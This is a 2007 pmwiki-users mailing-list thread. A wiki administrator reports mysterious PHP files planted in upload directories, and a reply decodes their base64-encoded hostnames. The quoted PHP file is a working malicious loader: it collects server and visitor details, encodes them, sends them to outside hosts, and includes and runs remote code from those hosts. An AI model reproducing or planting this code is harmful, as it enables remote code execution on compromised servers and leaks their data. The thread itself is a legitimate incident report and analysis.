The bas64 strings mean: http://www3.rssnews.ws http://www3.xmldata.info All the SEVER-info of .. are given to: ... these http addresses ...(base 64 encoded) PKHG
> -----Oorspronkelijk bericht----- > Van: [EMAIL PROTECTED] [mailto:pmwiki-users- > [EMAIL PROTECTED] Namens Dr Fred C > Verzonden: zaterdag 28 april 2007 18:35 > Aan: PmWiki Users > Onderwerp: [pmwiki-users] Mysterious php file appears in upload directory > > I went to upload a file to one of my wikis this morning and, while that > went fine, I noticed a curious 43248.php file that had been uploaded to > this upload directory, last night around 2:30 am. I checked with my > FTP program and quite a number of my various wikis had a similar php > file in the uploads directorys, and in the wiki.d directory -- always > with a different # for the file name, always of the same size. > > I downloaded it and it contained this info. > > <? error_reporting(0);$s="e";$a=(isset($_SERVER["HTTP_HOST"]) ? > $_SERVER["HTTP_HOST"] : $HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"]) ? > $_SERVER["SERVER_NAME"] : > $SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"]) ? > $_SERVER["REQUEST_URI"] : $REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"]) > ? $_SERVER["PHP_SELF"] : $PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"]) > ? $_SERVER["QUERY_STRING"] : > $QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"]) ? > $_SERVER["HTTP_REFERER"] : > $HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? > $_SERVER["HTTP_USER_AGENT"] : > $HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"]) ? > $_SERVER["REMOTE_ADDR"] : > $REMOTE_ADDR);$i=(isset($_SERVER["SCRIPT_FILENAME"]) ? > $_SERVER["SCRIPT_FILENAME"] : > $SCRIPT_FILENAME);$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"]) ? > $_SERVER["HTTP_ACCEPT_LANGUAGE"] : > $HTTP_ACCEPT_LANGUAGE);$str=base64_encode($a).".".base64_encode($b).".".ba > se64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_enc > ode($f).".".base64_encode($g).".".base64_encode($h).".$s.".base64_encode($ > i).".".base64_encode($j); > if > ((include(base64_decode("aHR0cDovLw==").base64_decode("d3d3My5yc3NuZXdzLnd > z")."/?".$str))){} > else > {include(base64_decode("aHR0cDovLw==").base64_decode("d3d3My54bWxkYXRhLmlu > Zm8=")."/?".$str);} > ?> > > -------- > Any ideas on what is going on here? > > -- > > Always, Dr Fred C > [EMAIL PROTECTED] > > > _______________________________________________ > pmwiki-users mailing list > [email protected] > http://www.pmichaud.com/mailman/listinfo/pmwiki-users _______________________________________________ pmwiki-users mailing list [email protected] http://www.pmichaud.com/mailman/listinfo/pmwiki-users
